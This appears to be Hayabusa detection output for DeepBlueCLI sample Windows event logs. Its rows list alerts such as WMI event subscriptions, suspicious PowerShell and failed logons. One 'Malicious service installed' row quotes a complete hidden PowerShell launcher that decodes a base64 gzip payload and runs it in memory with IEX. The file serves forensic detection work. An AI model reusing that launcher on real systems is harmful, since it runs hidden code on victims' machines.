Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 02:39:39.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 02:39:39.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 03:46:19.937 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 03:46:20.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 03:57:18.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 03:57:18.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 03:57:20.937 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 03:57:20.937 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 04:55:50.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 04:55:51.755 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 04:55:51.755 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 04:57:52.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 04:57:52.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: SYyGmEHvgHiGYApk : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 05:40:21.261 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 05:40:21.261 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 05:40:21.464 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 07:54:48.533 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 07:54:48.533 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 11:07:47.443 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 11:07:47.443 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 11:19:46.459 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 11:19:46.459 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 22:57:54.520 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 22:57:54.520 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 23:00:17.112 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 05:09:55.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 05:09:55.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 05:09:57.843 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 05:09:57.843 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 05:47:29.854 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 05:47:29.854 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 06:47:30.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 06:47:30.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 08:02:19.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 08:02:19.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 08:02:22.296 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 08:02:22.296 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-21 01:03:05.348 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-21 01:03:05.348 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-21 05:05:57.517 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-21 05:05:57.517 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-21 05:05:59.973 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-21 05:05:59.973 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-22 06:00:11.001 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-22 06:00:11.001 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-22 06:03:27.106 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-22 06:03:27.106 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-22 06:42:09.518 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-22 06:42:09.518 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-22 06:45:28.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-22 06:47:30.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-22 06:47:30.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-22 06:49:00.074 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-23 09:12:59.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-23 09:12:59.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-23 09:13:02.546 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-23 09:13:02.546 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-23 11:24:05.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-23 11:24:05.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-25 06:17:07.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-25 06:17:07.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-25 06:17:10.203 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-25 06:17:10.203 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:28:38.656 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-26 00:03:05.603 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-26 00:03:05.603 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-26 05:43:45.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-26 05:43:45.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-26 05:43:48.140 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-26 05:43:48.140 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-26 05:58:46.881 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Generic,,rules/sigma/deprecated/powershell_suspicious_invocation_generic.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-27 05:34:49.928 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-27 05:34:49.928 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-27 05:36:53.970 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-27 09:43:11.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-27 09:43:11.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-28 00:20:56.556 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-28 00:20:56.556 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-28 06:44:54.195 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-28 06:44:54.195 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-28 13:15:03.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-28 13:15:03.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 